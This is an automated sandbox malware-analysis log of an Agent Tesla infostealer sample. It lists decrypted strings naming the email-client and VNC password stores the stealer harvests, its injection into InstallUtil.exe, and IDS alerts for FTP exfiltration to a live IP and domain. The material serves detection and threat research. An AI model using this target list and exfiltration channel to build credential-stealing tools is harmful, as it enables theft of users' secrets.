                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Email
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: IMAP Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: POP3 Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: HTTP Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SMTP Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Email
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Email
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Email
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: IMAP Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: POP3 Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: HTTP Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SMTP Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Server
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Windows Mail App
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Email
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Server
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SchemaId
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: pResourceElement
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: pIdentityElement
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: pPackageSid
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: pAuthenticatorElement
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: syncpassword
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: mailoutgoing
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: FoxMail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Executable
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: FoxmailPath
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Storage\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Storage\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \mail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \mail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Accounts\Account.rec0
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Accounts\Account.rec0
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Account.stg
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Account.stg
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: POP3Host
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SMTPHost
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: IncomingServer
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Account
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: MailAddress
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: POP3Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Opera Mail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: opera:
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PocoMail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: appdata
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Pocomail\accounts.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Email
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: POPPass
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SMTPPass
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SMTP
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: eM Client
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: eM Client\accounts.dat
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: eM Client
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Accounts
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: "Username":"
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: "Secret":"
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: "ProviderName":"
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: o6806642kbM7c5
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Mailbird
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SenderIdentities
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Accounts
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Mailbird\Store\Store.db
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Server_Host
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Accounts
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Email
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Username
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: EncryptedPassword
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Mailbird
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: RealVNC 4.x
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: RealVNC 3.x
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: RealVNC 4.x
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: RealVNC 3.x
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\ORL\WinVNC3
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: TightVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\TightVNC\Server
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: TightVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\TightVNC\Server
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PasswordViewOnly
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: TightVNC ControlPassword
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\TightVNC\Server
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ControlPassword
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: TigerVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\TigerVNC\Server
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles(x86)
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: passwd
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles(x86)
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: passwd2
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: passwd
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: passwd2
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: passwd
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: passwd2
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles(x86)
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: passwd
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles(x86)
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: tTXQS6DONV.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: tTXQS6DONV.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        Source: Network traffic Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.6:49881 -> 162.241.203.30:34513
                        Source: Network traffic Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.6:49872 -> 162.241.203.30:21
                        Source: global traffic TCP traffic: 192.168.2.6:49881 -> 162.241.203.30:34513
                        Source: Joe Sandbox View IP Address: 162.241.203.30
                        Source: Joe Sandbox View ASN Name: OIS1US
                        Source: unknown FTP traffic detected: 162.241.203.30:21 -> 192.168.2.6:49872 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 13 of 150 allowed. 220-Local time is now 13:15. Server port: 21. 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity.
                        Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global traffic DNS traffic detected: DNS query: ftp.aminhacorretora.com.br
                        Source: InstallUtil.exe, 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aminhacorretora.com.br
                        Source: InstallUtil.exe, 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ftp.aminhacorretora.com.br
                        Source: InstallUtil.exe, 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B9BC58 CreateProcessAsUserW
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_00CC12B0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_00CC0950
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_00E88658
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_00E87EF0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_055A4A58
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_055A0074
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_05E74560
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_05E70040
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_05E70006
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_0742CF08
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_0742EFF8
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_0742D790
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_0742AE60
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_0742BEF8
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_0742E158
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07428DB8
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07424080
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07422F70
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07422F7C
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07422F80
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_0742D780
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_0742AE52
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_0742AE5C
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_0742CECF
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_0742BEE8
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_0742E148
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_0742E154
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_0742401E
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B9AB58
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B94B50
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B9C1D8
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B96DC0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B96568
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B9C4E0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B91820
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B98BB8
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B98BB4
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B98BA8
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B913FC
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B913F0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B923D0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B923C9
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B923CC
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B90B20
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe Code function: 1_2_07B90B1C
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B90B101_2_07B90B10
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B9CB781_2_07B9CB78
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B95B681_2_07B95B68
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B95B641_2_07B95B64
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B95B581_2_07B95B58
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B94B4C1_2_07B94B4C
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B94B401_2_07B94B40
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B90E201_2_07B90E20
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B90E101_2_07B90E10
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B916781_2_07B91678
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B916741_2_07B91674
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B916681_2_07B91668
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B911B91_2_07B911B9
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B99DB01_2_07B99DB0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B96DB01_2_07B96DB0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B969D91_2_07B969D9
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B911C81_2_07B911C8
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B911C41_2_07B911C4
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B9A5181_2_07B9A518
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B965581_2_07B96558
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B9003C1_2_07B9003C
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B9181C1_2_07B9181C
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B918101_2_07B91810
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B914001_2_07B91400
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B900061_2_07B90006
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B900401_2_07B90040
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_05E745351_2_05E74535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_030B40F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_030B4D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_030B4438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06A396B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06A3A6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06A333C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06A360F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06A3C018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06A30040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06A39E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06A30007
Source: tTXQS6DONV.exe, 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTokenTableApp.dll> vs tTXQS6DONV.exe
Source: tTXQS6DONV.exe, 00000001.00000002.2879833948.000000000099E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs tTXQS6DONV.exe
Source: tTXQS6DONV.exe, 00000001.00000002.2892478097.0000000005070000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTokenTableApp.dll> vs tTXQS6DONV.exe
Source: tTXQS6DONV.exe, 00000001.00000002.2881532887.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs tTXQS6DONV.exe
Source: tTXQS6DONV.exe, 00000001.00000002.2895167564.0000000007550000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRP8SH.dll6 vs tTXQS6DONV.exe
Source: tTXQS6DONV.exe, 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs tTXQS6DONV.exe
Source: tTXQS6DONV.exe, 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTokenTableApp.dll> vs tTXQS6DONV.exe
Source: tTXQS6DONV.exe, 00000001.00000000.2164224100.0000000000F5E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameyyy656.exe@ vs tTXQS6DONV.exe
Source: tTXQS6DONV.exe, 00000001.00000002.2888881438.0000000003B0E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs tTXQS6DONV.exe
Source: tTXQS6DONV.exe | Binary or memory string: OriginalFilenameyyy656.exe@ vs tTXQS6DONV.exe
Source: tTXQS6DONV.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tTXQS6DONV.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: tTXQS6DONV.exe, q4T5B.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, P.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, P.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, N.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/4@1/1
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tTXQS6DONV.exe.log
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
Source: tTXQS6DONV.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: tTXQS6DONV.exe | ReversingLabs: Detection: 68%
Source: unknown | Process created: C:\Users\user\Desktop\tTXQS6DONV.exe "C:\Users\user\Desktop\tTXQS6DONV.exe"
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
